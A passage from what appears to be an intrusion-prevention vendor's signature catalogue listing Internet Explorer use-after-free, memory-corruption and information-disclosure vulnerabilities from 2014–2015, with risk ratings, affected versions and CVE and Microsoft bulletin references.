Description: A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way objects are handled. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free
References:
CVE-2014-0274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0274
OSVDB-103173
http://www.osvdb.org/103173
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way objects are handled. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free
References:
CVE-2014-0275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0275
OSVDB-103174
http://www.osvdb.org/103174
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability exists in Internet Explorer. The vulnerability is due to accessing a freed CInput object in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free
References:
CVE-2014-0282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0282
BID-67862
http://www.securityfocus.com/bid/67862
OSVDB-107851
http://www.osvdb.org/107851
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way objects are handled. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-TextId_Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free
References:
CVE-2014-0283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0283
OSVDB-103181
http://www.osvdb.org/103181
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way objects are handled. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free
References:
CVE-2014-0286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0286
OSVDB-103184
http://www.osvdb.org/103184
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way objects are handled. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free
References:
CVE-2014-0287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0287
OSVDB-103185
http://www.osvdb.org/103185
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption
References:
CVE-2014-0303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0303
OSVDB-104300
http://www.osvdb.org/104300
MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012
Back to top

Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free
References:
CVE-2014-0307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0307
BID-66032
http://www.securityfocus.com/bid/66032
OSVDB-104304
http://www.osvdb.org/104304
MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012
Back to top

Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way objects are handled. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free
References:
CVE-2014-0312
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0312
OSVDB-104308
http://www.osvdb.org/104308
MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012
Back to top

Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption
References:
CVE-2014-0313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0313
MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012
Back to top

Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption
References:
CVE-2014-0324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0324
MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012
Back to top

Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability exist in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free
References:
CVE-2014-1765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1765
BID-66244
http://www.securityfocus.com/bid/66244
OSVDB-104583
http://www.osvdb.org/104583
MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037
Back to top

Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Internet Explorer. A remote, unauthenticated attacker can use this to execute arbitrary code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free
References:
CVE-2014-1815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1815
OSVDB-106900
http://www.osvdb.org/106900
MS14-029
http://technet.microsoft.com/security/bulletin/MS14-029
Back to top

Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows Vista; Windows 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability exist in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free
References:
CVE-2014-2804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2804
BID-68386
http://www.securityfocus.com/bid/68386
MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037
Back to top

Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2003; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption
References:
CVE-2014-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6366
OSVDB-115569
http://www.osvdb.org/115569
MS14-080
http://technet.microsoft.com/security/bulletin/MS14-080
Back to top

Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 2003; Windows 2008; Windows 2008 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption
References:
CVE-2014-8966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8966
OSVDB-115577
http://www.osvdb.org/115577
MS14-080
http://technet.microsoft.com/security/bulletin/MS14-080
Back to top

Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free
References:
CVE-2015-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0041
BID-72411
http://www.securityfocus.com/bid/72411
OSVDB-118161
http://www.osvdb.org/118161
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption
References:
CVE-2015-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0053
BID-72421
http://www.securityfocus.com/bid/72421
OSVDB-118171
http://www.osvdb.org/118171
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A security feature bypass vulnerability exist in Microsoft Internet Explorer. The vulnerability is due to unknown error in Internet Explorer. By exploiting this vulnerability, an attacker can more reliably predict memory offsets of specific instructions in a given call stack, which can be used to exploit other remote code execution vulnerabilities.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass
References:
CVE-2015-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0071
BID-72455
http://www.securityfocus.com/bid/72455
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: A use after free vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an issue with handling certain objects in memory. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free
References:
CVE-2015-0100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0100
BID-72926
http://www.securityfocus.com/bid/72926
OSVDB-119346
http://www.osvdb.org/119346
MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018
Back to top

Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A use-after-free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-TextId_Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free
References:
CVE-2015-1665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1665
MS15-032
http://technet.microsoft.com/security/bulletin/MS15-032
Back to top

Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free
References:
CVE-2015-1667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1667
OSVDB-120621
http://www.osvdb.org/120621
MS15-032
http://technet.microsoft.com/security/bulletin/MS15-032
Back to top

Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-646-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Internet Explorer which may lead to information disclosure.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure
References:
CVE-2015-1686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1686
MS15-043
http://technet.microsoft.com/security/bulletin/MS15-043
Back to top

Microsoft-Internet-Explorer-CVE-2015-1687

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1687
References:
CVE-2015-1687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1687
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-646-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an incomplete fix for CVE-2014-6323 which allows improper access control to the clipboardData object in memory. By enticing a target user to open and interact with a crafted web page, a remote attacker can exploit this vulnerability to access the data stored in the Windows clipboard.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure
References:
CVE-2015-1692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1692
OSVDB-121979
http://www.osvdb.org/121979
MS15-043
http://technet.microsoft.com/security/bulletin/MS15-043
Back to top

Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption
References:
CVE-2015-1705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1705
OSVDB-121987
http://www.osvdb.org/121987
MS15-043
http://technet.microsoft.com/security/bulletin/MS15-043
Back to top

Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Insecure Configuration
Description: A vulnerability exists in Microsoft Internet Explorer which allows scripts to download the contents of documents from different origins.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure
References:
CVE-2015-1729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1729
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-1730

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1730
References:
CVE-2015-1730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1730
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Insecure Configuration
Description: A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release
References:
CVE-2015-1733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1733
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-1735

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1735
References:
CVE-2015-1735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1735
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Insecure Configuration
Description: A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release
References:
CVE-2015-1738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1738
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-1744

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an issue while handling first-letter element styling when processing HTML and script code. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1744
References:
CVE-2015-1744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1744
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption
References:
CVE-2015-1745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1745
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A write-what-where vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in jscript9.dll while handling the DataView object with an ArrayBuffer under certain conditions. A remote attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where
References:
CVE-2015-1747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1747
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1748

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1748
References:
CVE-2015-1748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1748
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1750

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1750
References:
CVE-2015-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1750
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1752

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
